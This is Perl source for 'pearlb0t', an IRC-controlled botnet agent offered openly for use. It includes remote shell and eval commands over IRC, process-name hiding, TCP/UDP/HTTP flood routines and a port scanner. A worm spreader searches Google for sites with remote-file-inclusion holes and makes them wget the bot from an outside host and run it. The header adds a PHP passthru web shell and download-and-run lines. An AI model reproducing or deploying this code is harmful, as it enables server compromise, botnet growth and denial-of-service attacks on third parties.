#!/usr/bin/perl
############################
## pearlb0t by Mindfuck ##
################################################################################
############################################
#
# V 0.7b -Orginally writen by some guy i dont know, found 4 or 5 different versions on /tmp's, and no one worked...
# So i decided to learn perl and fix things up...
# - Fixed the Spreader
# - Added a few RFI exploits
# - Added Hostauth/Channelkey/Serverpass function
# - Added die command
# - Added bot Remover
# - Implemented a simple webserver that hosts the botfile on $wwwport
# Now you just have to config your phpshell.
# - Since some shells cant get the real external ip, you can use external webservers as well
# - You can even include external files
# ToDo:
# - Update Command
# - Connectbackshell trigger
# - MassDefeace
# - passwd/shadow sender
# - Find a "good" way to crypt the code without using special libs
#
# Cmd's:
# - Start exploiting: !say @sploit <seconds>
# - Kill the bot: !say @die
# - Delete Bot: !say @fuckit
# - Portscan: !say @portscan <ip/dns> <sourceport>
# - Tcpflood: !say @tcpflood <ip/dns> <port> <seconds>
# - Httpflood: !say @httpflood <ip/dns> <seconds>
# - Udpflood: !say @udpflood <ip/dns> <port> <seconds>
# - Version: !say @version
# - Op/deOp: !say @op/deop <nick>
# - Msg: !say @msg <nick/chan> <msg>
# - Chanflood: !say @flood <nick/chan> <msg>
# - CTCP: !say @ctcp <nick> <chat/ping/version/time>
# - CTCP-Flood: !say @ctcpflood <nick> <chat/ping/version/time>
# - Nickchange: !say @nick <nickname>
# - Connect: !say @connect <irc-server>
# - Raw Commands: !say @raw <rawcmd>
# - Eval: !say @eval <?>
#
#
# ###########################
# # php_shell.gif: #
# # <? #
# # passthru($_GET['cmd']); #
# # ?> #
# ###########################
#
# ###########################################################################
#############################
# # pwn.php #
# # <? #
# # passthru('cd /tmp;wget http://yourhost.org/pearlbot.pl;perl pearlbot.pl;rm pearlbot.pl.*'); #
# # passthru('cd /tmp;curl -O http://yourhost.org/pearlbot.pl;perl pearlbot.pl;rm pearlbot.pl.*'); #
# # passthru('cd /tmp;lwp-download http://yourhost.org/pearlbot.pl;perl pearlbot.pl;rm pearlbot.pl.*'); #
# # ?> #
# ###########################################################################
#############################
#
#
################################################################################
################################################
use strict();
use IO::Socket;
use Socket;
use IO::Select;
use Net::hostent;
# Checking if the process is allready running...
my $process = 'inedt'; if (`ps u` =~ /inedt/) { exit; } # change the shown process
my @admins = ("Mindfuck","x0r"); # admin nicknames
my @hostauth = ("pwnz.ya"); # admin host
my @channels = ("#pearl#"); # irc channel
my $chankey = 'titten'; # channel key
$server = 'pwndpwndpwnd.org' unless $server; # irc server
my $port = '11011'; # irc server port
my $servpass = 'Key'; # irc server password
my $wwwport = '1337'; # webserver port
my $phpshell = "http://mindfuck.gotdns.org/"; # URL of your phpshell
my $usepwnphp = '0'; # Include external file in your exploit?
my $pwnphp = "http://pwn4fun.gotdns.org/"; # A PhP file to include
my $scanmsg = '1'; # Print Exploit Messages to Channel?
my $bothttpd = '0'; # Use own httpd? (Set 2 for pwnphp)
my $ex_botfile = "http://mindfuck.gotdns.org/";
######################################### Exploits ###################################################################
my $search1 = "%22option=com_galleria%22+site%3A".$dom."%20", "inurl:%22".$dom."/index.php?option=com_galleria%22";
my $sploit1 = "/components/com_galleria/galleria.html.php?mosConfig_absolute_path=";
my $search2 = "%22inurl%3A%2Fmodules.php%3Fop%3Dmodload%22+%22inurl%3Acm_summary%22";
my $sploit2 = "/cm_navigation.inc.php?path_pre=";
my $search3 = "%22inurl%3Aindex.php%3Fwiki%3D%22+%22wikepage%22";
my $sploit3 = "/index.php?cmd=id&lng=";
my $tehsploit = $sploit3; # Set the active exploit here
my $tehsearch = $search3; # Set active search
################################################################################
#####################################
#########################################
# #
# NO NEED TO EDIT BELOW THIS LINE! #
# #
#########################################
my $filename = __FILE__;
my $lines_max='4';
my $sleep='5';
my $ifconfig = `/sbin/ifconfig`;
$ifconfig =~ m/(d+.d+.d+.d+)/;
my $ip = $1;
chop (my $nick = `whoami`);
chop (my $ircname = `whoami`);
chop (my $realname = `uname -sr`);
my $VERSION = '0.7b';
$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';
$SIG{'CHLD'} = 'IGNORE';
$server="$ARGV[0]" if $ARGV[0];
$0="$process"."0"x16;;
my $pid=fork;
exit if $pid;
die "Cant fork: $!" unless defined($pid);
print "Another one bites the Dust...n";
our %irc_servers;
our %DCC;
my $dcc_sel = new IO::Select->new();
$sel_client = IO::Select->new();
sub sendraw {
if ($#_ == '1') {
my $socket = $_[0];
print $socket "$_[1]n";
} else {
print $IRC_cur_socket "$_[0]n";
}
}
############ WWW START ##################
if ($bothttpd == 1) {
sub www() {
my $filename = __FILE__;
open(FILE, $filename);
my @botfile = <FILE>;
my $wwwserver = IO::Socket::INET->new(
Proto =>'tcp',
LocalPort =>$wwwport,
Listen=> SOMAXCONN,
Reuse=> 1 );
die "WWW Server NOT started" unless $wwwserver;
while ($wwwclient = $wwwserver->accept()) {
$wwwclient -> autoflush(1);
print $wwwclient "@botfile";
sleep(1);
close $wwwclient;
}
}
my $wwwpid=fork;
exit if $wwwpid;
die "Cant fork: $!" unless defined($wwwpid);
if (my $wwwpid = fork) {
waitpid($wwwpid, 0);
} else {
if (fork) {
exit;
} else {
www;
}
}
} else { print "Started without Bot httpd, make sure your botfile is reachablen"; }
############ WWW END ####################
sub connection {
my $meunick = $_[0];
my $server_con = $_[1];
my $port_con = $_[2];
my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$server_con", PeerPort=>$port_con) or return(1);
if (defined($IRC_socket)) {
$IRC_cur_socket = $IRC_socket;
$IRC_socket->autoflush(1);
$sel_client->add($IRC_socket);
$irc_servers{$IRC_cur_socket}{'host'} = "$server_con";
$irc_servers{$IRC_cur_socket}{'port'} = "$port_con";
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
$irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost;
nick("$meunick");
sendraw("USER $ircname ".$IRC_socket->sockhost." $server_con :$realname");
sleep 1;
}
}
my $line_temp;
while( 1 ) {
while (!(keys(%irc_servers))) { connection("$nick", "$server", "$port", "$servpass"); }
delete($irc_servers{''}) if (defined($irc_servers{''}));
my @ready = $sel_client->can_read(0);
next unless(@ready);
foreach $fh (@ready) {
$IRC_cur_socket = $fh;
$meunick = $irc_servers{$IRC_cur_socket}{'nick'};
$nread = sysread($fh, $msg, 4096);
if ($nread == 0) {
$sel_client->remove($fh);
$fh->close;
delete($irc_servers{$fh});
}
@lines = split (/n/, $msg);
for(my $c=0; $c<= $#lines; $c++) {
$line = $lines[$c];
$line=$line_temp.$line if ($line_temp);
$line_temp='';
$line =~ s/r$//;
unless ($c == $#lines) {
parse("$line");
} else {
if ($#lines == 0) {
parse("$line");
} elsif ($lines[$c] =~ /r$/) {
parse("$line");
} elsif ($line =~ /^(S+) NOTICE AUTH :***/) {
parse("$line");
} else { $line_temp = $line; }
}
}
}
}
sub parse {
my $servarg = shift;
if ($servarg =~ /^PING :(.*)/) {
sendraw("PONG :$1");
} elsif ($servarg =~ /^:(.+?)!(.+?)@(.+?) PRIVMSG (.+?) :(.+)/) {
my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5;
if ($args =~ /^001VERSION001$/) {
notice("$pn", "001VERSION IrOffer v1.4001");
}
if (grep {$_ =~ /^Q$hostmaskE$/i } @hostauth) {
if (grep {$_ =~ /^Q$pnE$/i } @admins) {
if ($onde eq "$meunick"){
shell("$pn", "$args");
}
if ($args =~ /^(Q$meunickE|!say)s+(.*)/ ) {
my $natrix = $1;
my $arg = $2;
if ($arg =~ /^!(.*)/) {
ircase("$pn","$onde","$1") unless ($natrix eq "!bot" and $arg =~ /^!nick/);
} elsif ($arg =~ /^@(.*)/) {
$ondep = $onde;
$ondep = $pn if $onde eq $meunick;
bfunc("$ondep","$1");
} else {
shell("$onde", "$arg");
}
}
}
}
}
elsif ($servarg =~ /^:(.+?)!(.+?)@(.+?)s+NICKs+:(S+)/i) {
if (lc($1) eq lc($meunick)) {
$meunick=$4;
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
}
} elsif ($servarg =~ m/^:(.+?)s+433/i) {
nick("$meunick|".int rand(999999));
} elsif ($servarg =~ m/^:(.+?)s+001s+(S+)s/i) {
$meunick = $2;
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
$irc_servers{$IRC_cur_socket}{'nome'} = "$1";
foreach my $channel (@channels) {
sendraw("JOIN $channel $chankey");
}
}
}
sub bfunc {
my $printl = $_[0];
my $funcarg = $_[1];
if (my $pid = fork) {
waitpid($pid, 0);
} else {
if (fork) {
exit;
} else {
if ($funcarg =~ /^portscan (.*)/) {
my $hostip="$1";
my @ports=("21","22","23","25","80","113","135","445","1025","5000","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","8080","8018");
my (@result, %port_banner);
sendraw($IRC_cur_socket, "PRIVMSG $printl :002[SCAN]002 Scanning ".$1." for open ports.");
foreach my $port (@ports) {
my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $port, Proto => 'tcp', Timeout => 4);
if ($scansock) {
push (@result, $port);
$scansock->close;
}
}
if (@result) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :002[SCAN]002 Open port(s): @result");
} else {
sendraw($IRC_cur_socket,"PRIVMSG $printl :002[SCAN]002 No open ports found");
}
}
if ($funcarg =~ /^tcpfloods+(.*)s+(d+)s+(d+)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :002[TCP]002 Attacking ".$1.":".$2." for ".$3." seconds.");
my $itime = time;
my ($cur_time);
$cur_time = time - $itime;
while ($3>$cur_time){
$cur_time = time - $itime;
&tcpflooder("$1","$2","$3");
}
sendraw($IRC_cur_socket, "PRIVMSG $printl :002[TCP]002 Attack done ".$1.":".$2.".");
}
if ($funcarg =~ /^version/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :002[VERSION]002 pearlb0t ver ".$VERSION);
}
if ($funcarg =~ /^www/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :002[WWW]002 Bot serving itself on $ip:$wwwport");
}
if ($funcarg =~ /^die/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :002[DIE]002 Okay Boss, im goin home...");
system("kill -9 `ps ax |grep $process |grep -v grep|awk '{print $1;}'`");
}
if ($funcarg =~ /^fuckit/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :002[DIE]002 Hmkay, deleting ".$filename."...");
system("rm $filename");
sendraw($IRC_cur_socket, "PRIVMSG $printl :002[DIE]002 Stopping process $process");
system("kill -9 `ps ax |grep $process |grep -v grep|awk '{print $1;}'`");
}
if ($funcarg =~ /^sploit (.*)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :002[SCAN]002 Scanning for ".$1." seconds.");
if ($bothttpd == 1) {
srand;
my $itime = time;
my ($cur_time);
my ($exploited);
$boturl= "http://$ip:$wwwport";
$cur_time = time - $itime;$exploited = 0;
while($1>$cur_time){
$cur_time = time - $itime;
@urls=fetch();
foreach $url (@urls) {
$cur_time = time - $itime;
my $path = "";my $file = "";($path, $file) = $url =~ /^(.+)/(.+)$/;
$url =$path."$tehsploit$phpshell?cmd=cd+/tmp;wget+$boturl+-o+$filename;perl+$filename";
my $page = http_query($url);
if ($scanmsg == 1) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :002[SCAN]002 Exploiting http://".$url);
$exploited = $exploited + 1;
}
}
}
}
if ($bothttpd == 0) {
srand;
my $itime = time;
my ($cur_time);
my ($exploited);
$boturl= "$ex_botfile";
$cur_time = time - $itime;$exploited = 0;
while($1>$cur_time){
$cur_time = time - $itime;
@urls=fetch();
foreach $url (@urls) {
$cur_time = time - $itime;
my $path = "";my $file = "";($path, $file) = $url =~ /^(.+)/(.+)$/;
$url =$path."$tehsploit$phpshell?cmd=cd+/tmp;wget+$boturl;perl+$filename";
my $page = http_query($url);
if ($scanmsg == 1) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :002[SCAN]002 Exploiting http://".$url);
$exploited = $exploited + 1;
}
}
}
}
if (($usepwnphp == 1) && ($bothttpd == 2)) {
srand;
my $itime = time;
my ($cur_time);
my ($exploited);
$cur_time = time - $itime;$exploited = 0;
while($1>$cur_time){
$cur_time = time - $itime;
@urls=fetch();
foreach $url (@urls) {
$cur_time = time - $itime;
my $path = "";my $file = "";($path, $file) = $url =~ /^(.+)/(.+)$/;
$url =$path."$tehsploit$pwnphp";
my $page = http_query($url);
if ($scanmsg == 1) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :002[SCAN]002 Exploiting http://".$url);
$exploited = $exploited + 1;
}
}
}
}
if ($scanmsg == 1) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :002[SCAN]002 Exploited ".$exploited." boxes in ".$1." seconds.");
}
}
if ($funcarg =~ /^httpfloods+(.*)s+(d+)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :002[HTTP]002 Attacking ".$1.":80 for ".$2." seconds.");
my $itime = time;
my ($cur_time);
$cur_time = time - $itime;
while ($2>$cur_time){
$cur_time = time - $itime;
my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>80);
print $socket "GET / HTTP/1.1rnAccept: */*rnHost: ".$1."rnConnection: Keep-Alivernrn";
close($socket);
}
sendraw($IRC_cur_socket, "PRIVMSG $printl :002[HTTP]002 Attacking done ".$1.".");
}
if ($funcarg =~ /^udpfloods+(.*)s+(d+)s+(d+)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :002[UDP]002 Attacking ".$1." with ".$2." Kb packets for ".$3." seconds.");
my ($dtime, %packets) = udpflooder("$1", "$2", "$3");
$dtime = 1 if $dtime == 0;
my %bytes;
$bytes{igmp} = $2 * $packets{igmp};
$bytes{icmp} = $2 * $packets{icmp};
$bytes{o} = $2 * $packets{o};
$bytes{udp} = $2 * $packets{udp};
$bytes{tcp} = $2 * $packets{tcp};
sendraw($IRC_cur_socket, "PRIVMSG $printl :002[UDP]002 Sent ".int(($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)." Kb in ".$dtime." seconds to ".$1.".");
}
exit;
}
}
}
sub ircase {
my ($kem, $printl, $case) = @_;
if ($case =~ /^join (.*)/) {
j("$1");
}
if ($case =~ /^part (.*)/) {
p("$1");
}
if ($case =~ /^rejoins+(.*)/) {
my $chan = $1;
if ($chan =~ /^(d+) (.*)/) {
for (my $ca = 1; $ca <= $1; $ca++ ) {
p("$2");
j("$2");
}
} else {
p("$chan");
j("$chan");
}
}
if ($case =~ /^op/) {
op("$printl", "$kem") if $case eq "op";
my $oarg = substr($case, 3);
op("$1", "$2") if ($oarg =~ /(S+)s+(S+)/);
}
if ($case =~ /^deop/) {
deop("$printl", "$kem") if $case eq "deop";
my $oarg = substr($case, 5);
deop("$1", "$2") if ($oarg =~ /(S+)s+(S+)/);
}
if ($case =~ /^msgs+(S+) (.*)/) {
msg("$1", "$2");
}
if ($case =~ /^floods+(d+)s+(S+) (.*)/) {
for (my $cf = 1; $cf <= $1; $cf++) {
msg("$2", "$3");
}
}
if ($case =~ /^ctcps+(S+) (.*)/) {
ctcp("$1", "$2");
}
if ($case =~ /^ctcpfloods+(d+)s+(S+) (.*)/) {
for (my $cf = 1; $cf <= $1; $cf++) {
ctcp("$2", "$3");
}
}
if ($case =~ /^nick (.*)/) {
nick("$1");
}
if ($case =~ /^connects+(S+)s+(S+)/) {
connection("$2", "$1", 6667);
}
if ($case =~ /^raw (.*)/) {
sendraw("$1");
}
if ($case =~ /^eval (.*)/) {
eval "$1";
}
}
sub shell {
my $printl=$_[0];
my $cmd=$_[1];
if ($cmd =~ /cd (.*)/) {
chdir("$1") || msg("$printl", "No such file or directory");
return;
}
elsif ($pid = fork) {
waitpid($pid, 0);
} else {
if (fork) {
exit;
} else {
my @resp=`$cmd 2>&1 3>&1`;
my $c=0;
foreach my $linha (@resp) {
$c++;
chop $linha;
sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha");
if ($c == "$lines_max") {
$c=0;
sleep $sleep;
}
}
exit;
}
}
}
sub tcpflooder {
my $itime = time;
my ($cur_time);
my ($ia,$pa,$proto,$j,$l,$t);
$ia=inet_aton($_[0]);
$pa=sockaddr_in($_[1],$ia);
$ftime=$_[2];
$proto=getprotobyname('tcp');
$j=0;$l=0;
$cur_time = time - $itime;
while ($l<1000){
$cur_time = time - $itime;
last if $cur_time >= $ftime;
$t="SOCK$l";
socket($t,PF_INET,SOCK_STREAM,$proto);
connect($t,$pa)||$j--;
$j++;$l++;
}
$l=0;
while ($l<1000){
$cur_time = time - $itime;
last if $cur_time >= $ftime;
$t="SOCK$l";
shutdown($t,2);
$l++;
}
}
sub udpflooder {
my $iaddr = inet_aton($_[0]);
my $msg = 'A' x $_[1];
my $ftime = $_[2];
my $cp = 0;
my (%packets);
$packets{icmp} = $packets{igmp} = $packets{udp} = $packets{o} = $packets{tcp} = 0;
socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;
socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
return(undef) if $cp == 4;
my $itime = time;
my ($cur_time);
while ( 1 ) {
for (my $port = 1; $port <= 65000; $port++) {
$cur_time = time - $itime;
last if $cur_time >= $ftime;
send(SOCK1, $msg, 0, sockaddr_in($port, $iaddr)) and $packets{igmp}++;
send(SOCK2, $msg, 0, sockaddr_in($port, $iaddr)) and $packets{udp}++;
send(SOCK3, $msg, 0, sockaddr_in($port, $iaddr)) and $packets{icmp}++;
send(SOCK4, $msg, 0, sockaddr_in($port, $iaddr)) and $packets{tcp}++;
for (my $pc = 3; $pc <= 255;$pc++) {
next if $pc == 6;
$cur_time = time - $itime;
last if $cur_time >= $ftime;
socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
send(SOCK5, $msg, 0, sockaddr_in($port, $iaddr)) and $packets{o}++;
}
}
last if $cur_time >= $ftime;
}
return($cur_time, %packets);
}
sub ctcp {
return unless $#_ == 1;
sendraw("PRIVMSG $_[0] :001$_[1]001");
}
sub msg {
return unless $#_ == 1;
sendraw("PRIVMSG $_[0] :$_[1]");
}
sub notice {
return unless $#_ == 1;
sendraw("NOTICE $_[0] :$_[1]");
}
sub op {
return unless $#_ == 1;
sendraw("MODE $_[0] +o $_[1]");
}
sub deop {
return unless $#_ == 1;
sendraw("MODE $_[0] -o $_[1]");
}
sub j { &join(@_); }
sub join {
return unless $#_ == 0;
sendraw("JOIN $_[0]");
}
sub p { part(@_); }
sub part {
sendraw("PART $_[0]");
}
sub nick {
return unless $#_ == 0;
sendraw("NICK $_[0]");
}
sub quit {
sendraw("QUIT :$_[0]");
}
# Spreader
# this 'spreader' code isnt mine, i dont know who coded it.
# update: well, i just fix0red this shit a bit.
# update2: Dunno what you fix0red, but surely it wasnt the spreader, now its workin...
sub fetch(){
my $rnd=(int(rand(9999)));
my $n= 80;
if ($rnd<5000) { $n<<=1;}
my $s= (int(rand(10)) * $n);
my @domains = ("com","net","org","info","gov", "gob","gub","xxx", "eu","mil","edu","aero","name","us","ca","mx","pa","ni","cu","pr","ve","co","pe","ec",
"py","cl","uy","ar","br","bo","au","nz","cz","kr","jp","th","tw","ph","cn","fi","de","es","pt","ch","se","su","it","gr","al","dk","pl","biz","int","pro","museum","coop",
"af","ad","ao","ai","aq","ag","an","sa","dz","ar","am","aw","at","az","bs","bh","bd","bb","be","bz","bj","bm","bt","by","ba","bw","bn","bg","bf","bi",
"vc","kh","cm","td","cs","cy","km","cg","cd","dj","dm","ci","cr","hr","kp","eg","sv","aw","er","sk",
"ee","et","ge","fi","fr","ga","gs","gh","gi","gb","uk","gd","gl","gp","gu","gt","gg","gn","gw","gq","gy","gf","ht","nl","hn","hk","hu","in","id","ir",
"iq","ie","is","ac","bv","cx","im","nf","ky","cc","ck","fo","hm","fk","mp","mh","pw","um","sb","sj","tc","vg","vi","wf","il","jm","je","jo","kz","ke",
"ki","kg","kw","lv","ls","lb","ly","lr","li","lt","lu","mo","mk","mg","my","mw","mv","ml","mt","mq","ma","mr","mu","yt","md","mc","mn","ms","mz","mm",
"na","nr","np","ni","ne","ng","nu","no","nc","om","pk","ps","pg","pn","pf","qa","sy","cf","la","re","rw","ro","ru","eh","kn","ws","as","sm","pm","vc",
"sh","lc","va","st","sn","sc","sl","sg","so","lk","za","sd","se","sr","sz","rj","tz","io","tf","tp","tg","to","tt","tn","tr","tm","tv","ug","ua","uz",
"vu","vn","ye","yu","cd","zm","zw","");
my @str;
foreach $dom (@domains) {
push (@str,"$tehsearch");
}
my $query="www.google.com/search?q=";
$query.=$str[(rand(scalar(@str)))];
$query.="&num=$n&start=$s";
my @lst=();
my $page = http_query($query);
while ($page =~ m/<a class=l href="?http://([^>"]+)"?>/g){
if ($1 !~ m/google|cache|translate/){
push (@lst,$1);
}
}
return (@lst);
}
sub http_query($){
my ($url) = @_;
my $host=$url;
my $query=$url;
my $page="";
$host =~ s/href="?http:////;
$host =~ s/([-a-zA-Z0-9.]+)/.*/$1/;
$query =~s/$host//;
if ($query eq "") {$query="/";};
eval {
local $SIG{ALRM} = sub { die "1";};
alarm 10;
my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return;
print $sock "GET $query HTTP/1.0rnHost: $hostrnAccept: */*rnUser-Agent: Mozilla/5.0rnrn";
my @r = <$sock>;
$page="@r";
alarm 0;
close($sock);
};
return $page;
}